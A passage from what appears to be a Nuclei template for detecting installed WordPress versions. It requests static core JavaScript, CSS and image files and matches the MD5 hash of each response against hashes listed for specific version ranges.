"(\"2ea532fa670298e162824a0142ae7b9a\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"f6d921a62cf96294281e0a202a017846\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"4e654df64f6c6971d29676c04eb5481a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"4e9e692fb1d6bf02e7032c52739a93e5\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"e781b3e173836b68d9c9d16e24fe66ac\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"03bd5bce1479cfa83e955c1392efb02e\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"7ff2281b44db7103a37cabdeca0880ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/utils.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"19ea0da213eda9c7bc4360f1d4c18b3c\" == md5(body))" - - type: dsl - name: 4.4 - 4.6.20 - dsl: - - "(\"b59e4faadb8e122faa031d99f1966ea4\" == md5(body))" - - type: dsl - name: 4.0 - 4.3.25 - dsl: - - "(\"01b7f89601bfa36ffee09f056f2cc38a\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"7ef14f85ee633c3aa2be8db18c23121a\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a5f4880c9cca30561e9290f0dafda128\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"0cb234c48b5a81baaaaa30f570199d9d\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"3328e64dc78c8f83b8a976dd416b1269\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"06048f8ea732a49aa4215b704e49e935\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-video-widget.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"1574427094b8df449b4c21384fa2729d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"133a39bd8c47630947212e04dc47672a\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"94f76a64411630ce10e215e74e518f47\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ccda3ae7dca5f3ce647c51f953f36eda\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-image-widget.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"086291b366af501ea4378aca5dc07032\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"8fac7176be3db30dfc5d0c59514ac1f2\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"082c8d564caa265aa7aaaad422a4acee\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"8ec83b6b93233f94e76351378fdf2865\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-gallery-widget.js" - matchers: - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"437aac35ea3d3a698505ce9aa7a4c090\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"90ec0828c40b94a8e5f3eea5ce423fec\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"7bfc632ffa82a98949d5c2f5ea3c0e9b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ie-rtl.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"12e3799f007d1876b12835d0e5ef2f52\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"0eaa7745837d3d443a69d044ed3d34ce\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e3b5f3b8fced413fbba5140998158eb2\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8a1eb2b5519ed4a89bd86735409925c3\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"931711f9b9b9e7c4182dbe7e382cf804\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"0b9e0977caa2f7f8f935d5b5536cf6d7\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"fd7d0df7b16e00fd528ccf616e4124d3\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e1b5a696678e23949a7b98d8510e0f55\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"9a4e00d098d584cfb57cb10eaaa71214\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"879bad5fb1d6485b6d9b773c53771c36\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"3284308c86ab8da25a1102d29cf30bdf\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"7ee33e4b7774cdf5d016e99acf01409a\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"09ba525a650f839144871fba3f38c8f2\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"40582bd18d990906e258b22f748a5a31\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"f47a2b680e86328c5ca128a561360675\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"1f4b5b58ca585ed3897535738260631f\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"a0d306ff28ee7a91c04dd2ba920d589a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"167ed35a0cf8b028cacc63b0894b6629\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"bf33651153ac82258acd4f56be924851\" == md5(body))" - - type: dsl - name: 2.5 - 2.6 - dsl: - - "(\"650555c0139e543813ef451d0e83873f\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"f6cb41f2339fb35c868329897706705d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e9c1bfd4053c8fc39dd8506be39cd1cf\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"55a791469c9bc1886f4272fd3c6ddf27\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b2eac5246949450f734078369c7a7d30\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/code-editor-rtl.css" - matchers: - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"b00c896ff0bcbcdd0c8d3f5331842e60\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8c7770ef099a7c001a3f8d103d95291d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"c1a750b14528327531f6920d680d409f\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"f2b0f0835b1c0011ee2f52a48af4abdf\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"33750485bdfeeabb2f63e40054422dc6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/hoverintent-js.min.js" - matchers: - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"492aa1f2633a89704f676a97e9a13a74\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"08207f7088b62e6096753736b01cc13f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js" - matchers: - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ffff6c533f2ca672619b343bdd5e1546\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-url.js" - matchers: - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f1983e64a04b50274943a4e733b5bd38\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-url.min.js" - matchers: - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"7274005802b2e364d7780806526095cf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js" - matchers: - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"bfba25ea79e5be8e3aef1ca60cac1e83\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/w-logo-blue-white-bg.png" - matchers: - - type: dsl - name: 5.4.2 - 5.6 - dsl: - - "(\"000bf649cc8f6bf27cfb04d1bcdcd3c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-pointer.min.js" - matchers: - - type: dsl - name: 3.7 - 5.2.9 - dsl: - - "(\"368f987c644d70580097e48066c99082\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"44006ca7f608bdd5a0a6445d84dfa14d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a6b1f0f1180e40f7847a2a6d660da570\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"eb111877acfda6a2831ec64cca27e9d3\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"6ddb95e5911a96be8c8166011db91383\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"c323cf4339706987ff20d5d06c3b95cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-auth-check.min.js" - matchers: - - type: dsl - name: 4.5 - 5.2.9 - dsl: - - "(\"99c97a7d6ad9e1ba06bbd76f29ecaad6\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"49773ca795f07b9a6f04caacd4ebc61b\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"4584099c38e5ed5f6f44644a79b6e473\" == md5(body))" - - type: dsl - name: 3.8.34 - 4.1.32 - dsl: - - "(\"b7a95205254b5b44d7da6c40feee0f71\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"9381710ce753b9832b1a2c698862ab3b\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"616c48c103a3090c52f6fbe7e4df4e97\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"1c475b507eb2f1d6e2086c0bff58852b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6283adf848ff1848a76894050e791263\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c5999da6ac39a9e88a807571df55eeb6\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"2264f035cf3f6ab020bf1b40421184f3\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"c27f3884d55cb48bd02574d49fd9fdfb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags.min.js" - matchers: - - type: dsl - name: 4.8 - 5.2.9 - dsl: - - "(\"29e8d4a7d3c7c16432b99a053c7a5df5\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"4ec2ae66360aa0edc72274ea7188309a\" == md5(body))" - - type: dsl - name: 3.8 - 4.5.23 - dsl: - - "(\"172f499d40d4217bbf684cd552031acb\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"61be6f278a1f944b26447cdc26d835fe\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"5ef59229c14589b9cfa643363e830068\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"402b83d7eb8503875c7109fca9337099\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b0934f29dd7066a46581e8e3e260610b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"45bb1424ed1b5b1d133a043b26b235ca\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"f888c34433b712f06e43af40429ba9d4\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"17907e9882677f339e16eb884c1295e4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/color-picker.min.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"2e3a1f2a0ac299060d3c853e61d002b0\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"e6aa90b2182ca576285b067a632ab0c6\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"cf27af726c42ff82f96aa6b5d6c50936\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"1aa57d225b7d9bb8bfa8500e0c2de029\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"5e6cb3e8e3774341f4a81ae60ff240ba\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.9.33 - dsl: - - "(\"d25e49828f69f88f952f7901ea23cd12\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"0700f055de0f02747e6bf5b1ecd2d362\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"9bee909f1eff9d9228caf7768440f935\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"f928ad0829d1c05c2c2d2a46acbbc3db\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"fb9ae1cb65eb001aa159656e525946af\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"ca1331e8606d08cddd3db4a1c50a0625\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d8c89846a5bc52ad623c42aad0eede4c\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"fe70ea8607c181a61c44bdbfe9a86bdf\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"fbaf1efbbfa3d66fbbe551c04f55c274\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"9fc10081b896d90cb84e953e4a273e91\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/inline-edit-tax.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"dde9127de4c2995fc434b200f0dd615b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"75c601c64c8582af3fd5501adf8a70df\" == md5(body))" - - type: dsl - name: 4.4.2 - 4.4.24 - dsl: - - "(\"83826163165ed1d49e8f3c6618d48c32\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.1 - dsl: - - "(\"8d376028d50307c5c478fb47e8573d09\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"31c678bb877b9fcfc08ee557a06bcef8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"4aa2a2e6ee60243f003d3ebb47edf4b4\" == md5(body))" - - type: dsl - name: 3.8.34 - 4.1.32 - dsl: - - "(\"fb20ee6486993251b2345d7f10679170\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"6b10931419d409bc0e4dc2b985d93fad\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"e152c4564839eea5d03f5c1f8f7f3304\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"f51e5bb7e388108cdbb09e73dab882b0\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"1e857c903f02b235ee15d338e578e0b0\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"276a51688f82154e668da8ccc2664360\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"8f644169a9fbdc883848e5045955e43f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6df2176e4c845dae0a4798bfbe503380\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ce0ac0de288078af8c9421bd2e7fcb86\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"5b6cf02e1847560c7c2708b9cec8333c\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"5828c84d341a897ddba6d7c1a7074a26\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"5d779b1702467d3ff8daf053f809a602\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"c3920f8399e5369fa7477612b192a85b\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"24b30b63b51ccaea07d4f8c13f058032\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9e3439b2b5d41797f67e6c4f4d0f17a3\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"7a8cf8a6366e2a07ece9aa4ca4a8baba\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"19bd4858dd4636e58e5bf1b4c55886a7\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"c4e88d5a0c0ee055cc792ceedf20ad48\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"625f3147b42809ded504e0aaba0d69e4\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"78da87ac01615efd1b9087de60c6e18e\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"1a99537df5afe33ad7972ed385716c03\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a53c355041b61b5a9c030e21be5f2447\" == md5(body))" - - type: dsl - name: 2.9 - 3.3.3 - dsl: - - "(\"f052c91aba8f3eb8d7418730e2571096\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"c9fdf1db2027922e9bbdcd77dac6fb8b\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"eeb709706143ea4420b07cef572a7e85\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"14c91445e03a47d7f18294fcd1181ac3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme-install.min.js" - matchers: - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"667fcfc5babfffd925f42a9347a0f7ff\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"60cae9c8d9cb09c304baddd7b3c79486\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-loader.min.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"07ffbac3f2ba98be80444078bf478e06\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"50874b301967fa5cf16245d209ebee6c\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"920192c0f83cb413dcbd4c2d8907496d\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8acc18afc849d02b6fd4050074a93a9b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b17d4faeeed1f4def3a3622c3f5fdb84\" == md5(body))" - - type: dsl - name: 3.7 - 3.9.33 - dsl: - - "(\"4bbf055e4673e39953b716ac908a0abf\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"17da53aeae6cc8d61bed50c2ab38c209\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"31d9f8e828b08e3de1c3922fd12161ad\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"4c72237dfde5e31f0c2d759ce3cac520\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"07da3b1185906661024d9b4162b39c4a\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"2d180d2fcea4d807be0600d25b2dc34a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-base.min.js" - matchers: - - type: dsl - name: 4.7.4 - 4.8.15 - dsl: - - "(\"82e54a4c50d795de58583bc8c3c5366c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"1204a65bdca9b53b11e21b0a4006fed0\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"6d7aedb2931f1728e3052ad0916e890f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c872a6fb39d1e2392723b32871311ccb\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"2eac88d29658e3be60fb3502410e1d18\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f82ef9ea2e66e725aca286df49f09644\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"dd9397747816f2234cd21d2f9d1a50f8\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.9.33 - dsl: - - "(\"5d8bdcb7dfef4c386321eb2e2447a038\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"bd0b29fbd66949b3c771ebc9c7d1b598\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"05b76950045388239de89bcb4043aa4a\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"43068dabcf577d41f4e84f59d8586628\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"0bcc3681daa40ee2e0ecee241388a898\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1ccea3e2215182f5aac1b63aae392148\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"13024099bcd0d7bb501eaade5ee8509d\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"fcc7483e8bc9a333e8e4fe1aeee52504\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/shortcode.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"b342d56a90b09adfad6d95a4717c0b24\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"82ad4fbf4eb5f246ebcd565b66a00bee\" == md5(body))" - - type: dsl - name: 3.9.1 - 4.3.25 - dsl: - - "(\"18ba5832006079f3bcbdeb4c38c92adf\" == md5(body))" - - type: dsl - name: 3.7 - 3.9 - dsl: - - "(\"94f0a6572dc53376bc73c29e2dbc2d27\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"45b08b8d56d3b5138e2056cda31fd674\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"1c041f7f933a23946e80dc51b5e1c938\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"18e0dd81085ad19822288e41aefbfca9\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ac175b8437594f86e5f28bf90a4306bf\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"cff973dcfb4f01f66d15dae46b318d59\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/heartbeat.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"126cc4d1e35b74edb525b06e3788e0f2\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"1a30d2f3f43f2e3fb867298e53cad1a1\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"1dd3c7ed8699b740ebf4040b1304436d\" == md5(body))" - - type: dsl - name: 3.8.34 - 4.0.32 - dsl: - - "(\"ce0f4c41502115dd456d8fe69ad9d6a6\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"1ea138dbe250685292d30ac37620acfc\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"9aae6231a46e14ac89912dba8c94625f\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"291eec7c9016045eab556f6cd9e988fd\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"364c2b9d670cdf41e827a627eb11b04b\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"37ce90356b4d2587270f9f9fce795035\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1b189a9d958d638c3bd1459ab6d19f8d\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f860581fb8612b68fa2503e50422b737\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"f44e97b62fc8a3a338fcc764a887e455\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/gallery.min.js" - matchers: - - type: dsl - name: 4.4 - 5.0.11 - dsl: - - "(\"4e7b25e9bc3374cf391d5a652651a277\" == md5(body))" - - type: dsl - name: 3.8.34 - 4.3.25 - dsl: - - "(\"1c986fe3039dbacf126de2f0dc644f6f\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"b54be68c89acf61cb65c5a6be0afd68d\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"7f4fb19184e149d7c0578c37983a258b\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"60bf226af2fd347b5a9deabe699a7a57\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"a0128dff24056e6476db0cf96ed23139\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"501eb34a56ce4495a13d4e467916955d\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"cacc448a4e2a324a23bb2b00fccc994e\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"09225ccd5df14b041aa451535d952d0b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/handlers.min.js" - matchers: - - type: dsl - name: 4.6.6 - 5.2.9 - dsl: - - "(\"a08d4288293bfbcd0d198f7aa3eda619\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.4 - dsl: - - "(\"3ea40ab7c27b75d20c3da22f097d6614\" == md5(body))" - - type: dsl - name: 4.2.15 - 4.5.23 - dsl: - - "(\"11bf2f04087fa26d73fe609aea0deb5c\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.8 - dsl: - - "(\"813ceb60612a365924d271704d03d95c\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.17 - dsl: - - "(\"e10ed46fab9c2698e592308ef1bc1274\" == md5(body))" - - type: dsl - name: 3.9.19 - 4.1.32 - dsl: - - "(\"a4ceb21a21b2f7387cda6aa3987fbe5d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.20 - dsl: - - "(\"ddf4c7760bc883551c7c624c96366b2c\" == md5(body))" - - type: dsl - name: 3.8.21 - 3.8.33 - dsl: - - "(\"5134fc8ba506fcb19b83f48e00f13173\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.20 - dsl: - - "(\"7f22f0ade68c07f94df3b40a9ab01632\" == md5(body))" - - type: dsl - name: 3.7.21 - 3.7.33 - dsl: - - "(\"d784d1950872d6bf872f285bcf801def\" == md5(body))" - - type: dsl - name: 3.5.2 - 3.6.1 - dsl: - - "(\"ea290fe2e1a4d1d6433f46636417c28a\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.1 - dsl: - - "(\"d672c9820c43194fc1d0b7536ec55bc9\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"0af080d323b400286d6b6c1ce141abfc\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"ae0fb9c92bfd8b294508118aa3a9f7d5\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"9164287a9d6da8155bcdd5888fbcab4f\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"07da0a8acb054283d518eef97bbbd180\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/nav-menu.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"f881f44197fe880cb2257955d66a167f\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"030df1f8550983eeb6f34ff46bfd8d7b\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"a80e641bb281235d159937ecd5b8393f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"2fa48561beb42a5197c7e4dbb812d9b8\" == md5(body))" - - type: 